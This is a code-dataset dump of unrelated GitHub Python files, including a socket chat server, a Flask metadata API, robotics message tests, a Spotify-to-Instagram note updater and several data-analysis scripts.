'''\r\n\r\n","repo_name":"Marwan-shahata/ROV_PROJECT_Hydrotron","sub_path":"ROV.py","file_name":"ROV.py","file_ext":"py","file_size_in_byte":10410,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"41605572949","text":"import numpy as np\nimport pandas as pd\nimport argparse\nfrom NFW import *\nfrom units import *\n\n\ndef main():\n mc_fname = '../mc/DNN_Cascade_L5_NuGen.pkl'\n mc = pd.read_pickle(mc_fname)\n\n if not args.allsky:\n try:\n mc_psi = mc['psi'] # Angle between l.o.s. and GC\n except:\n ras = mc['scram_trueRA']\n decs = mc['scram_trueDEC']\n mc_psi = np.array([psi_los_gc(ra,dec) for ra,dec in zip(ras,decs)])\n mc['psi'] = mc_psi\n mc.to_pickle(mc_fname)\n\n try:\n assert args.new == False\n if args.allsky:\n column_dens=np.load('../created_files/column_dens_allsky.npy')\n else:\n mc_col_dens = mc['col_dens']\n column_dens=np.load('../created_files/DNN_NuGen_column_dens_true.npy')\n assert mc_col_dens == column_dens\n except:\n if args.allsky: # All Sky Generic Column Density\n ras = np.linspace(0,2*np.pi,100)\n decs = np.linspace(-np.pi/2,np.pi/2,100)\n RA,DEC = np.meshgrid(ras,decs)\n PSI = np.array([psi_los_gc(RA.flatten()[i],DEC.flatten()[i]) for i in range(len(RA.flatten()))])\n column_dens = t_spline(PSI)\n np.save('../created_files/column_dens_allsky',column_dens)\n else: # MC Column Density\n column_dens = t_spline(mc_psi)\n np.save('../created_files/DNN_NuGen_column_dens_true',column_dens)\n mc['col_dens'] = column_dens\n mc.to_pickle(mc_fname)\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='This script computes the column density (CD) for MC events')\n parser.add_argument('--new',default=False, action=argparse.BooleanOptionalAction,help='Compute new set of array.')\n parser.add_argument('--allsky',default=False, action=argparse.BooleanOptionalAction,help='Compute CD for all sky')\n args = parser.parse_args()\n main()\n","repo_name":"diyaselis/darkmatter_neutrino_scattering","sub_path":"code/create_column_density.py","file_name":"create_column_density.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30653622616","text":"import socket\nimport threading\n\nHOST = '127.0.0.1'\nPORT = 3000\n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.bind((HOST, PORT))\n\nserver.listen()\n\nclients = []\nnicknames = []\n\ndef broadcast(msg):\n for client in clients:\n client.send(msg)\n\ndef handle(client):\n while True:\n try:\n msg = client.recv(1024)\n print(f'{nicknames[clients.index(client)]} diz {msg}')\n broadcast(msg)\n except:\n index = clients.index(client)\n clients.remove(client)\n client.close()\n nickname = nicknames[index]\n nicknames.remove(nickname)\n\ndef receive():\n while True:\n client, adress = server.accept()\n print(f'Conectado com {adress}!')\n client.send(\"NICK\".encode('utf-8'))\n nickname = client.recv(1024)\n\n nicknames.append(nickname)\n clients.append(client)\n\n print(f\"Nickname do cliente é {nickname}\")\n broadcast(f\"{nickname} conectado ao servidor!\\n\".encode('utf-8'))\n client.send(\"Conectado ao servidor\".encode('utf-8'))\n\n thread = threading.Thread(target=handle, args=(client,))\n thread.start()\n\nprint(\"Server funcionando...\")\nreceive()","repo_name":"Thiago250801/ChatApp","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38026710685","text":"import datetime\nimport requests\nfrom tqdm import tqdm \nfrom webService import WebService\nimport csv\nimport sys,getopt\n\nwebService = WebService()\n\ndef listaGrabaciones(recordings):\n recordinglist = []\n x=0\n try:\n number_of_recordings = (len(recordings['results']))\n if number_of_recordings <= 0:\n return None\n while x < number_of_recordings:\n recordinglist.append({\"recording_id\" : recordings['results'][x]['id'], \"recording_name\" : recordings['results'][x]['name'], \"duration\":recordings['results'][x]['duration'], \"storageSize\":recordings['results'][x]['storageSize'],\"created\": recordings['results'][x]['created']})\n x += 1\n return recordinglist\n except TypeError:\n return None\n\n\n\n\ndef descargarGrabacion(url:str, fname:str):\n resp = requests.get(url,stream=True)\n total = int(resp.headers.get('content-length',0))\n progress_bar = tqdm(total=total, unit='iB', unit_scale=True,unit_divisor=1024)\n with open(fname,'wb') as file:\n for data in resp.iter_content(chunk_size=1024):\n size = file.write(data)\n progress_bar.update(size)\n progress_bar.close()\n\n \n\ndef downloadrecording(recording_list, name, course_uuid):\n for recording in recording_list:\n recording_data = webService.get_recording_data(recording['recording_id'])\n filename = name + ' - ' + recording['recording_name'].replace(':', ' ').replace('/', ' ').replace('”', '').replace('“', '').replace(',', '').replace('?', '') + '.mp4'\n fullpath = './downloads/'\n print(fullpath + filename)\n descargarGrabacion(recording_data['extStreams'][0]['streamUrl'],fullpath + filename)\n \n\ndef crearReporte(reporte):\n filename = \"recordingReport.csv\"\n header = [\"Recording ID\", \"Recording Name\", \"Duration\", \"Storage Size (MB)\", \"Created Date\"]\n file = open(filename, 'w')\n writer = csv.writer(file)\n writer.writerow(header)\n for x in range(len(reporte)):\n registro = reporte[x]\n recording_id = registro[0]\n recording_name = registro[1]\n duration = calcularTiempo(int(registro[2]/1000))\n storage = str(round(float(registro[3])/1000000, 2))\n created = convertirFecha(registro[4])\n writer.writerow([recording_id,recording_name,duration,storage,created])\n file.close()\n return \"Report: recordingReport.csv created!\"\n\n\n\ndef leerCursos(filename):\n cursos = []\n with open(filename) as reader:\n for linea in reader:\n contenido = linea.rstrip()\n cursos.append(str(contenido))\n reader.close()\n return cursos\n\n\ndef leerUUID(filename):\n uuids = []\n with open(filename) as reader:\n for linea in reader:\n contenido = linea.rstrip()\n uuids.append(str(contenido))\n reader.close()\n return uuids\n\n\ndef main(argv):\n archivoCursos = ''\n archivoUUID = ''\n semanas = 0\n try:\n opts,args = getopt.getopt(argv,\"hf:e:w:\", [\"cfile=\",\"ext=\",\"weeks=\"])\n except getopt.GetoptError:\n print('Collab.py -f -w ')\n print('Collab.py -e -w ')\n sys.exit(2)\n for opt,arg in opts:\n if opt == '-h':\n print('Collab.py -f -w ')\n print('Collab.py -e -w ')\n sys.exit()\n elif opt in ('-f', '--cfile'):\n archivoCursos = arg\n elif opt in ('-w', '--weeks'):\n semanas = int(arg)\n elif opt in ('-e', '--ext'):\n archivoUUID = arg\n\n return [archivoCursos, archivoUUID,semanas]\n\n\ndef calcularTiempo(s):\n m, s = divmod(s,60)\n h,m = divmod(m,60)\n d, h = divmod(h,24)\n tiempoEnSesion = datetime.time(h,m,s)\n return tiempoEnSesion.strftime('%H:%M:%S')\n\n\ndef convertirFecha(fecha):\n objetoFecha = datetime.datetime.strptime(fecha,'%Y-%m-%dT%H:%M:%S.%fZ')\n return objetoFecha.strftime('%b %d,%Y')\n\n\n","repo_name":"daveyherrera/PyCollab","sub_path":"Utilidades.py","file_name":"Utilidades.py","file_ext":"py","file_size_in_byte":4050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"424147655","text":"# 프로그래머스 게임 맵 최단거리 (Level 2)\nfrom collections import deque\n\n\ndef solution(maps):\n dir_x = [1, -1, 0, 0]\n dir_y = [0, 0, 1, -1]\n N = len(maps)\n M = len(maps[0])\n visited = [[0 for _ in range(M)] for _ in range(N)]\n\n queue = deque()\n queue.append([0, 0])\n visited[0][0] = 1\n while queue:\n x, y = queue.popleft()\n for i in range(4):\n temp_x = x + dir_x[i]\n temp_y = y + dir_y[i]\n if 0 <= temp_x < N and 0 <= temp_y < M and not visited[temp_x][temp_y] and maps[temp_x][temp_y] == 1:\n queue.append([temp_x, temp_y])\n visited[temp_x][temp_y] = 1 + visited[x][y]\n if not visited[N-1][M-1]:\n return -1\n\n return visited[N-1][M-1]\n\n\nmaps = [[1, 0, 1, 1, 1], [1, 0, 1, 0, 1], [\n 1, 0, 1, 1, 1], [1, 1, 1, 0, 0], [0, 0, 0, 0, 1]]\nprint(solution(maps))\n","repo_name":"kimhyeongjun95/AlgoPullgo","sub_path":"026주차/게임맵최단거리/woosteelz.py","file_name":"woosteelz.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"16446581117","text":"from app import app, db, auto, admin_only, ENTITY_MAPPING\nfrom app.models import metadata\nfrom flask import abort, jsonify, request, Response\nfrom flask_login import login_required, current_user\nfrom dateutil import parser\nimport json\n\n\n@app.route('/ThreatKB/metadata', methods=['GET'])\n@auto.doc()\n@login_required\ndef get_all_metadata():\n \"\"\"Return all active metadata\n Return: list of metadata dictionaries\"\"\"\n active_only = request.args.get(\"active_only\", True)\n artifact_type = request.args.get(\"artifact_type\", 0)\n format = request.args.get(\"format\", \"list\")\n filter = request.args.get(\"filter\", None)\n\n if format == \"dict\" and filter:\n return Response(json.dumps([metadata.Metadata.get_metadata_dict(filter.upper())]), mimetype=\"application/json\")\n\n q = metadata.Metadata.query\n q = q.filter_by(active=active_only)\n if artifact_type:\n q = q.filter_by(artifact_type == artifact_type)\n\n if filter:\n return Response(json.dumps([entity.to_dict() for entity in q.all() if entity.to_dict()[\"type\"] == filter]),\n mimetype='application/json')\n else:\n return Response(json.dumps([entity.to_dict() for entity in q.all()]), mimetype='application/json')\n\n\n@app.route('/ThreatKB/metadata/', methods=['GET'])\n@login_required\n@auto.doc()\ndef get_metadata(id):\n \"\"\"Return task associated with given id\n Return: task dictionary\"\"\"\n entity = metadata.Metadata.query.get(id)\n if not entity:\n abort(404)\n\n return jsonify(entity.to_dict())\n\n\n@app.route('/ThreatKB/metadata', methods=['POST', 'PUT'])\n@auto.doc()\n@login_required\n@admin_only()\ndef create_metadata():\n \"\"\"Create new metadata\n From Data: key (str), active (int), artifact_type (int), type (str), default (str), show_in_table (int)\n Return: task dictionary\"\"\"\n\n type_ = request.json['type']\n default = request.json.get('default', None)\n choices = request.json.get(\"choices\", \"\")\n choices = [choice.strip() for choice in choices.split(\",\") if len(choice) > 0]\n\n if type_.lower() == \"integer\" and default:\n default = int(default)\n\n if type_.lower() == \"date\" and default:\n default = parser.parse(default)\n\n if type_.lower() == \"select\" and not choices:\n raise Exception(\"You must provide choices with the select option\")\n\n entity = metadata.Metadata(\n key=request.json['key']\n , active=request.json.get('active', 1)\n , artifact_type=request.json['artifact_type']\n , type_=type_\n , default=default\n , show_in_table=0\n , required=request.json.get(\"required\", 0)\n , export_with_release=request.json.get(\"export_with_release\", 1)\n , created_user_id=current_user.id\n )\n db.session.add(entity)\n db.session.commit()\n\n for choice in choices:\n db.session.add(metadata.MetadataChoices(choice=choice, metadata_id=entity.id, created_user_id=current_user.id))\n db.session.commit()\n\n return jsonify(entity.to_dict()), 201\n\n\n@app.route('/ThreatKB/metadata', methods=['DELETE'])\n@auto.doc()\n@login_required\n@admin_only()\ndef delete_metadata_by_id_in_param():\n \"\"\"Delete metadata associated with the given id\n Return: None\"\"\"\n id = request.args.get(\"id\")\n entity = metadata.Metadata.query.get(id)\n\n if not entity:\n abort(404)\n\n entity.active = False\n db.session.add(entity)\n db.session.commit()\n\n return jsonify(''), 204\n\n\n@app.route('/ThreatKB/metadata/', methods=['DELETE'])\n@auto.doc()\n@login_required\n@admin_only()\ndef delete_metadata(id):\n \"\"\"Delete metadata associated with the given id\n Return: None\"\"\"\n entity = metadata.Metadata.query.get(id)\n\n if not entity:\n abort(404)\n\n # db.session.delete(entity)\n entity.active = False\n db.session.add(entity)\n db.session.commit()\n\n return jsonify(''), 204\n","repo_name":"InQuest/ThreatKB","sub_path":"app/routes/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","stars":90,"dataset":"github-code","pt":"72"} +{"seq_id":"31953435905","text":"import numpy as np\nimport unittest\nimport time\nfrom isaac import Application, Message\n\n\nclass TestPythonMessage(unittest.TestCase):\n '''\n Test receiving messages via the application message API\n '''\n @classmethod\n def setUpClass(cls):\n # method will be ran once before any test is ran\n cls.app = Application('packages/pyalice/tests/pymessage_test.app.json')\n cls.app.start()\n\n @classmethod\n def tearDownClass(cls):\n # method will be ran once after all tests have run\n cls.app.stop()\n\n def setUp(self):\n # make sure the app ticks at least one time between tests\n time.sleep(0.5)\n\n def test_receive_message_as_json(self):\n msg = self.app.receive(\"mock\", \"Detections2Generator\", \"mock_detections\")\n\n self.assertNotEqual(msg.type_id, 0)\n self.assertGreater(msg.acqtime, 0)\n self.assertEqual(msg.json[\"predictions\"][0][\"label\"], \"A\")\n\n def test_receive_message_as_proto(self):\n msg = self.app.receive(\"mock\", \"Detections2Generator\", \"mock_detections\")\n\n self.assertNotEqual(msg.type_id, 0)\n self.assertGreater(msg.acqtime, 0)\n self.assertEqual(msg.proto.predictions[0].label, \"A\")\n\n def test_receive_message_tensor(self):\n msg = self.app.receive(\"mock\", \"CameraGenerator\", \"color_left\")\n\n self.assertGreater(msg.acqtime, 0)\n self.assertIsNotNone(msg.tensor)\n\n def test_no_message_available(self):\n msg = self.app.receive(\"node\", \"component\", \"channel\")\n self.assertIsNone(msg)\n\n def test_send_message_with_acqtime(self):\n send_msg = Message.create_message_builder('PingProto')\n send_msg.proto.message = 'payload'\n send_msg.acqtime = 10\n self.app.publish('node', 'ledger', 'in', send_msg)\n\n recv_msg = self.app.receive('node', 'ledger', 'in')\n self.assertEqual(recv_msg.proto.message, 'payload')\n self.assertEqual(recv_msg.acqtime, 10)\n\n def test_send_message_has_metadata(self):\n send_msg = Message.create_message_builder('PingProto')\n send_msg.proto.message = 'payload'\n self.app.publish('node', 'ledger', 'in', send_msg)\n\n recv_msg = self.app.receive('node', 'ledger', 'in')\n self.assertGreater(recv_msg.pubtime, 0)\n self.assertNotEqual(recv_msg.uuid, \"\")\n\n def test_send_message_with_buffer(self):\n send_msg = Message.create_message_builder('PingProto')\n send_msg.proto.message = 'payload'\n buffer = np.empty(3, dtype=np.dtype('B'))\n buffer[0] = 1\n buffer[1] = 11\n buffer[2] = 111\n send_msg.buffers = [buffer]\n self.app.publish('node', 'ledger', 'in', send_msg)\n\n recv_msg = self.app.receive('node', 'ledger', 'in')\n self.assertEqual(recv_msg.buffers[0][0], 1)\n self.assertEqual(recv_msg.buffers[0][1], 11)\n self.assertEqual(recv_msg.buffers[0][2], 111)\n\n def test_send_message_proto(self):\n send_msg = Message.create_message_builder('PingProto')\n send_msg.proto.message = 'payload'\n self.app.publish('node', 'ledger', 'in', send_msg)\n\n recv_msg = self.app.receive('node', 'ledger', 'in')\n self.assertNotEqual(recv_msg.type_id, 0)\n self.assertEqual(recv_msg.proto.message, 'payload')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"NamWoo/isaac-sdk-20201201-427971df2","sub_path":"sdk/packages/pyalice/tests/pymessage_test.py","file_name":"pymessage_test.py","file_ext":"py","file_size_in_byte":3336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"34116932972","text":"\nlista = [\n ('chave', 'valor'),\n ('chave2', 'valor2'),\n ('chave3', 3),\n]\n\n# d1 = { x: y*2 for x, y in lista}\n# d1 = { x.upper(): y.upper()*2 for x, y in lista}\n\nd1 = { f'chave_{x}': x**2 for x in range(5)}\n\n\nprint(d1)","repo_name":"pinheirogus/Curso-Python-Udemy","sub_path":"Dict comp/aula67.py","file_name":"aula67.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"34498097902","text":"# 검사 상수(키값) 지정\r\nkey_list = []# 키값 저장용\r\nfor value in range(2, 14):# 키값 저장\r\n if value >= 10:\r\n key_list.append(value % 10 + 2)\r\n else:\r\n key_list.append(value)\r\n\r\n# 주민번호 입력받기\r\nuser_num = input(\"주민번호 13자리를 입력하세요\")\r\n\r\n# 주민번호 판별 후 (리스���)저장\r\nuser_list = [] # 리스트 저장용\r\nfor value in user_num:\r\n if value.isdigit():\r\n user_list.append(int(value))\r\n\r\n# 리스트와 키값 비교계산\r\ncal_sum = 0\r\nfor value in range(12):\r\n # 곱셈, 덧셈\r\n cal_sum += (key_list[value] * user_list[value])\r\n\r\n# 체크 계산\r\ncheck_value = 11 - (cal_sum % 11)\r\nif check_value >= 10:\r\n check_value = check_value % 10\r\n# 유효 여부 판별\r\nif check_value == user_list[12]:\r\n print(\"유효한 주민번호 입니다.\")\r\nelse:\r\n print(\"유효하지 않은 주민번호 입니다.\")","repo_name":"CSKYScarlet/work","sub_path":"python/user_num.py","file_name":"user_num.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40087767164","text":"import spotipy\nfrom instagrapi import Client\nfrom spotipy.oauth2 import SpotifyOAuth\nfrom dotenv import load_dotenv\nimport os\nimport time\n\n# Load from .env\nload_dotenv()\nusername = os.getenv(\"USERNAME\")\npassword = os.getenv(\"PASSWORD\")\nCLIENT_ID = os.getenv(\"CLIENT_ID\")\nCLIENT_SECRET = os.getenv(\"CLIENT_SECRET\")\nREDIRECT_URI = os.getenv(\"REDIRECT_URI\")\n\n# Setup Instagram authentication\ncl = Client()\ncl.login(username, password)\n\n# Set up Spotify authentication\nsp = spotipy.Spotify(auth_manager=SpotifyOAuth(client_id=CLIENT_ID,\n client_secret=CLIENT_SECRET,\n redirect_uri=REDIRECT_URI,\n scope=\"user-read-playback-state\"))\n\n# Make sure it's not over 60 characters\n# Instagram may see a failed request for 60+ chars and get sus :3\ndef check_string_length(input_string):\n if len(input_string) > 60:\n raise ValueError(\"IT'S TOO FUCKING BIG YOU BUMBLING FORK\")\n else:\n print(\"Note is under 60 characters, weewoo!\")\n\n# Cut it off WOOOOOOOOO\ndef truncate(s):\n if len(s) > 20:\n return s[:17] + \"...\"\n else:\n return s\n\n# Ensure it works the first time\ntrack_name = None\n\nwhile True:\n # Get currently playing track\n current_track = sp.current_playback()\n\n # Get current track info and set it as the user's note if track_name changes\n if current_track is not None and 'item' in current_track:\n new_track_name = current_track['item']['name']\n\n if new_track_name != track_name:\n artist_name = current_track['item']['artists'][0]['name']\n truncated_track_name = truncate(new_track_name)\n truncated_artist_name = truncate(artist_name)\n content = (f\"🎵 Playing: {truncated_track_name} by {truncated_artist_name}\")\n check_string_length(content)\n note = cl.create_note(content, 0)\n print(f\"Track Changed! Set note to '{content}'\")\n\n # Update track_name to the new_track_name\n track_name = new_track_name\n else:\n print(\"Track not changed, sleeping for 10 seconds. shhhhh mimimi\")\n else:\n print(\"No track is currently playing.\")\n\n # Add a delay to avoid continuous API requests\n time.sleep(10) # Adjust the delay time as needed","repo_name":"rainyskye/spotify-ignotes","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41457811159","text":"#\n# @lc app=leetcode id=2562 lang=python3\n#\n# [2562] Find the Array Concatenation Value\n#\n\n# @lc code=start\nfrom collections import deque\nclass Solution:\n def findTheArrayConcVal(self, nums: List[int]) -> int:\n ans =0\n nums = deque(nums)\n\n while len(nums) >1:\n ans+=int(str(nums.popleft())+str(nums.pop()))\n \n if len(nums):\n ans+=nums[0]\n \n return ans\n\n \n# @lc code=end\n\n","repo_name":"HOZH/leetCode","sub_path":"leetCodePython2020/2562.find-the-array-concatenation-value.py","file_name":"2562.find-the-array-concatenation-value.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"72972113513","text":"from os import system\n\nsystem('clear')\n\nprint('Analisando as medidas...')\nreta_1 = float(input('Primeiro seguimento: '))\nreta_2 = float(input('Segundo segmento: '))\nreta_3 = float(input('Terceiro segmento: '))\n\nequilatero = reta_1 == reta_2 == reta_3\nisosceles = reta_1 == reta_2 or reta_2 == reta_3 or reta_1 == reta_3\nescaleno = reta_1 != reta_2 != reta_3\n\nif reta_1 < reta_2 + reta_3 and reta_2 < reta_1 + reta_3 and reta_3 < reta_2 + reta_1:\n print('Os segmentos podem formar um triângulo')\n\n if equilatero:\n print('É um triângulo equilatero')\n elif isosceles:\n print('É um triângulo isósceles')\n else:\n print('É um triângulo escaleno')\n\nelse:\n ('Os segmentos NÃO podem formar um triângulo')\n","repo_name":"bernaRocha/guanabara_Python","sub_path":"exercicios31-50/ex_042-analisando-triangulos.py","file_name":"ex_042-analisando-triangulos.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"27630444598","text":"# rectangle-information.py\n\nfrom graphics import *\n\ndef main():\n\n win = GraphWin(\"Rectangle information\", 320, 240)\n win.setBackground(\"white\")\n\n instructions = Text(Point(160, 20), \"Click twice for the apex of the rectangle.\")\n instructions.draw(win)\n\n p1 = win.getMouse()\n p2 = win.getMouse()\n\n rectangle = Rectangle(Point(p1.getX(), p1.getY()), Point(p2.getX(), p2.getY()))\n rectangle.setFill(\"yellow\")\n rectangle.setWidth(2)\n rectangle.setOutline(\"black\")\n rectangle.draw(win)\n\n instructions.setText(\"Calculating the area and perimeter of the rectangle.\")\n\n dx = p2.getX() - p1.getX()\n dy = p2.getY() - p1.getY()\n\n area = dx * dy\n perimeter = 2 * (dx + dy)\n\n print(\"The area of the rectangle is\", area, \", and the perimeter is\", perimeter, \".\")\n\n print(\"Press to quit\")\n\n win.getKey()\n win.close()\n\nmain()\n","repo_name":"sebutz/John-Zelle-Python-Programming","sub_path":"rectangle-information.py","file_name":"rectangle-information.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25348977407","text":"__author__ = 'admin'\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport glob\nimport traceback\nimport sys\nimport collections\nfrom collections import deque\nfrom itertools import islice\nimport math\n\n\ndef sliding_window(iterable, size=25, step=1, fillvalue=None):\n print(\"Inside Function------------->>>\")\n if size < 0 or step < 1:\n raise ValueError\n it = iter(iterable)\n q = deque(islice(it, size), maxlen=size)\n print(q)\n if not q:\n return # empty iterable or size == 0\n q.extend(fillvalue for _ in range(size - len(q))) # pad to size\n while True:\n yield iter(q) # iter() to avoid accidental outside modifications\n q.append(next(it))\n q.extend(next(it, fillvalue) for _ in range(step - 1))\n\n\ndef read_in_chunks(file_object):\n \"\"\"Lazy function (generator) to read a file piece by piece.\n Default chunk size: 1k.\"\"\"\n while True:\n data = file_object.readline()\n if not data:\n break\n yield data\n\n\ninput_file = input(\"Enter file path :\")\ni = 1\nj = 0\ntry:\n fileList = glob.glob(input_file + '*.csv')\n c = open(\"C:\\\\mtech Data\\\\congestion\\\\test script\\\\cleanedFile.csv\", 'w')\n print(fileList)\n for file in fileList:\n a = open(file, 'r')\n line = ''\n dq = collections.deque(maxlen=2040)\n dqTemp = collections.deque(maxlen=2040)\n i = 0\n diffFlag = 0\n for lines in read_in_chunks(a):\n # line = sliding_window(lines)\n # print(line)\n # for _ in range(2050):\n dq.append(lines)\n dqTemp.append(lines)\n i = i + 1\n # repeated compute\n\n if (i == 2040):\n diffFlag = 0\n dq.reverse()\n dqTemp.reverse()\n try:\n while (dq):\n # print(dq)\n tempLine1 = dq.pop()\n #print(tempLine1)\n tmp1 = tempLine1.split(',')\n tempLine2 = dq.pop()\n tmp2 = tempLine2.split(',')\n diff = 0\n #print(tmp1[18])\n if ((tmp1[18] != 'pressure') & (tmp1[18] != '') & (tmp2[18] != '')):\n diff = math.fabs(float(tmp2[18]) - float(tmp1[18]))\n #print(diff)\n if (float(diff) > 0.1000):\n diffFlag = 1\n break\n while (dqTemp):\n tp = dqTemp.pop()\n strTemp = tp.rstrip('\\n') + ',' + str(diffFlag) + ',' + '\\n'\n # print(diffFlag)\n c.write(strTemp)\n strTemp = ''\n diffFlag = 0\n dq.clear()\n dqTemp.clear()\n i = 0\n\n except StopIteration as e:\n print(e)\n\nexcept Exception as e:\n print(e)\n exc_type, exc_value, exc_traceback = sys.exc_info()\n traceback.print_tb(exc_traceback, limit=1, file=sys.stdout)\n","repo_name":"chestasofat/PythonScripts","sub_path":"barometerPattern.py","file_name":"barometerPattern.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40462086230","text":"\nfrom django.test import TestCase\nfrom web.forms import ModuleForm\nfrom web.models import Module\n\n\n\nexample_module = {'title' : \"A cylinder\",\n 'modulename' : \"cylinder\", \n 'author' : \"Phaiax\", \n 'author_acronym' : \"Px\",\n 'sourcecode' : \"module cylinder() { }\", \n 'documentation' : \"call cylinder()\", \n 'description' : \"This makes a cylinder\",\n 'version' : 1}\n\nclass ModuleModelTest(TestCase):\n\n \n def test_can_create_and_safe_module(self):\n M = Module()\n M.author = \"Phaiax\"\n M.save()\n R = Module.objects.get(guid=M.guid)\n self.assertEqual(\"Phaiax\", R.author)\n\n \n def test_module_generates_and_saves_uniquename(self):\n M = Module(**example_module)\n gn = M.generate_uniquename()\n M.save()\n self.assertEquals(gn, M.uniquename)\n \n def test_uniquename_is_always_unique(self):\n M = Module(**example_module)\n M.save()\n M2 = Module(**example_module)\n M2.save()\n self.assertNotEqual(M2.uniquename, M.uniquename)\n pass\n \n def test_form_validates_that_sourcecode_contains_modulename(self):\n invalid_module = example_module.copy()\n invalid_module['modulename'] = 'baseball'\n M = ModuleForm(invalid_module)\n self.assertFalse(M.is_valid())\n self.assertTrue('sourcecode' in M.errors)\n \n def test_module_validates_that_modulename_is_valid(self):\n invalid_module = example_module.copy()\n invalid_module['modulename'] = '1cylinder'\n M = ModuleForm(invalid_module)\n self.assertFalse(M.is_valid())\n self.assertTrue('modulename' in M.errors)\n invalid_module['modulename'] = 'cylin der'\n M = ModuleForm(invalid_module)\n self.assertFalse(M.is_valid())\n self.assertTrue('modulename' in M.errors)\n invalid_module['modulename'] = 'calinger%'\n M = ModuleForm(invalid_module) \n self.assertFalse(M.is_valid())\n self.assertTrue('modulename' in M.errors)\n invalid_module['modulename'] = 'cylinder'\n M = ModuleForm(invalid_module) \n self.assertTrue(M.is_valid())\n self.assertFalse('modulename' in M.errors)\n \n \n def test_model_generates_url(self):\n M = ModuleForm(example_module).save()\n resp = self.client.get(M.get_absolute_url())\n self.assertEqual(resp.context['module'].guid, M.guid)\n","repo_name":"Phaiax/openscad-seamlesslib-server","sub_path":"src/web/tests/modulemodel.py","file_name":"modulemodel.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25407756600","text":"def has_odd(input_set):\r\n if len(input_set) == 0:\r\n return False\r\n opt = False\r\n for element in input_set:\r\n if element % 2 == 1:\r\n opt = True\r\n return opt\r\n\r\n\r\nlist1 = {112, 10, 4, 6, 8}\r\nprint(has_odd(list1))","repo_name":"kran333/my_Encrypt_pro","sub_path":"PrinciplesOfProgramming/has_odd.py","file_name":"has_odd.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72698431914","text":"#!/usr/bin/env python3\n\nimport pandas as pd\n\nimport json\nimport glob\nimport os\nimport re\n\nbase = \"exp/\"\npaths = glob.glob(base + \"preprocessing/*.json\")\ndata = [json.load(open(path)) for path in paths]\n\ndef path_to_graph(path):\n return {\n 'ger06': 'TDGer06',\n 'ptv17': 'TDEur17',\n 'ptv20': 'TDEur20',\n 'osm_europe': 'OSM Europe',\n 'osm_ger': 'OSM Germany',\n 'osm_ger_td': 'OSM Germany',\n 'europe': 'DIMACS Europe',\n }[[x for x in path.split('/') if x != ''][-1]]\n\ngraphs = pd.DataFrame.from_records([{\n **run,\n 'graph': path_to_graph(run['args'][1]),\n 'num_nodes': run['graph']['num_nodes'],\n 'num_edges': run['graph']['num_arcs'],\n} for run in data if 'graph' in run])\n\nruntime_pattern = re.compile(\".*Needed (\\\\d+)musec\\\\..*\")\n\ndef parse_contraction_output(path):\n stats = { 'ch_contraction_running_time_s': 0.0 }\n\n with open(path, 'r') as f:\n for line in f:\n if not 'graph' in stats:\n stats['graph'] = path_to_graph(line.strip())\n else:\n match = runtime_pattern.match(line)\n if match:\n stats['ch_contraction_running_time_s'] += int(match[1]) / 1000000\n\n return stats\n\nch_preprocessing = pd.DataFrame.from_records([parse_contraction_output(path) for path in glob.glob(base + \"preprocessing/ch/*.out\")])\n\nruntime_pattern = re.compile(\".*running time : (\\\\d+)musec.*\")\n\ndef parse_flowcutter_partition_output(path):\n stats = { 'cch_ordering_running_time_s': 0.0 }\n\n with open(path, 'r') as f:\n for line in f:\n if not 'graph' in stats:\n stats['graph'] = path_to_graph(line.strip())\n else:\n match = runtime_pattern.match(line)\n if match:\n stats['cch_ordering_running_time_s'] += int(match[1]) / 1000000\n\n return stats\n\ncch_ordering = pd.DataFrame.from_records([parse_flowcutter_partition_output(path) for path in glob.glob(base + \"preprocessing/cch/*.out\")])\n\ntable = graphs.groupby(['graph'])[['basic_customization_running_time_ms', 'contraction_running_time_ms', 'graph_build_running_time_ms',\n 'perfect_customization_running_time_ms', 'respecting_running_time_ms', 'num_nodes', 'num_edges']].mean()\n\ntable = table.reindex(['OSM Germany', 'DIMACS Europe', 'TDGer06', 'TDEur17', 'TDEur20'])\n\ntable = table.join(ch_preprocessing.groupby('graph').mean()).join(cch_ordering.groupby('graph').mean())\ntable['num_nodes'] = table['num_nodes'] / 1000000.0\ntable['num_edges'] = table['num_edges'] / 